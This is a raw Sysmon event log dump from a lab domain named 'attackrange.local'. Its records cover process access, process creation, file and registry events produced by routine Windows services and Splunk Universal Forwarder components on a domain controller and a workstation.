07:48:50.723{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047573Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:50.723{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F3E2-60EB-0E7D-00000000CF01}9460C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001047572Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:50.722{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F3E2-60EB-0E7D-00000000CF01}9460C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001047571Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:50.705{466BC892-F3E2-60EB-0E7D-00000000CF01}9460C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001047570Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:50.488{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A49D395BF5494EDC4A30E010D6793F3,SHA256=1216763C8D2A124D52F70AE3A452702023AB1B812B1D6A9F866A54A3E1E2941B,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000806944Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:50.150{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DCC60ACAC32F423EACD35F09254532C2,SHA256=EFA2434BB709D7E7BA39B17BCE4413D86708ECE26F52E553EEA36862D05DB63E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047569Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:50.388{466BC892-F3E2-60EB-0D7D-00000000CF01}71129060C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047568Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:50.205{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F3E2-60EB-0D7D-00000000CF01}7112C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047567Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:48:50.189{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047566Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:50.189{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047565Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:48:50.189{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047564Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:50.189{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047563Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:48:50.189{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F3E2-60EB-0D7D-00000000CF01}7112C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001047562Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:50.189{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F3E2-60EB-0D7D-00000000CF01}7112C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001047561Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:50.190{466BC892-F3E2-60EB-0D7D-00000000CF01}7112C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001047600Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:51.988{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F3E3-60EB-107D-00000000CF01}3140C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047599Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:51.973{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047598Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:48:51.973{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047597Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:51.973{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047596Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:48:51.973{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047595Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:51.973{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F3E3-60EB-107D-00000000CF01}3140C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001047594Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:51.973{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F3E3-60EB-107D-00000000CF01}3140C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001047593Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:51.973{466BC892-F3E3-60EB-107D-00000000CF01}3140C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 13241300x80000000000000001047592Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:48:51.704{466BC892-02BC-60E8-3000-00000000CF01}2160C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\DFD6B7A8-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_DFD6B7A8-0000-0000-0000-100000000000.XML 13241300x80000000000000001047591Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 
07:48:51.704{466BC892-02BC-60E8-3000-00000000CF01}2160C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\6C48E9CC-B771-47F3-A036-36AE114D8798\Config SourceDWORD (0x00000001) 13241300x80000000000000001047590Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:48:51.704{466BC892-02BC-60E8-3000-00000000CF01}2160C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\6C48E9CC-B771-47F3-A036-36AE114D8798\Replica Set Configuration File\\?\C:\System Volume Information\DFSR\Config\Replica_6C48E9CC-B771-47F3-A036-36AE114D8798.XML 10341000x80000000000000001047589Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:51.621{466BC892-F3E3-60EB-0F7D-00000000CF01}101363916C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001047588Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:51.504{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D780B18ECB1B3EDF93374C796A836398,SHA256=9B07024B832D3DC7EBA8BF75B3762146CF18AEDB8516CB013B9AACCC3F637E72,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000806945Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:51.166{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=279DAC26BDFFB058B6C756B3E4E9641E,SHA256=7972352177ECD00635F70AFE4144084C2E159C6758998DBB926C4CEC35F0BDB7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047587Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:51.321{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F3E3-60EB-0F7D-00000000CF01}10136C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047586Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:51.304{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001047585Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:51.304{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047584Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 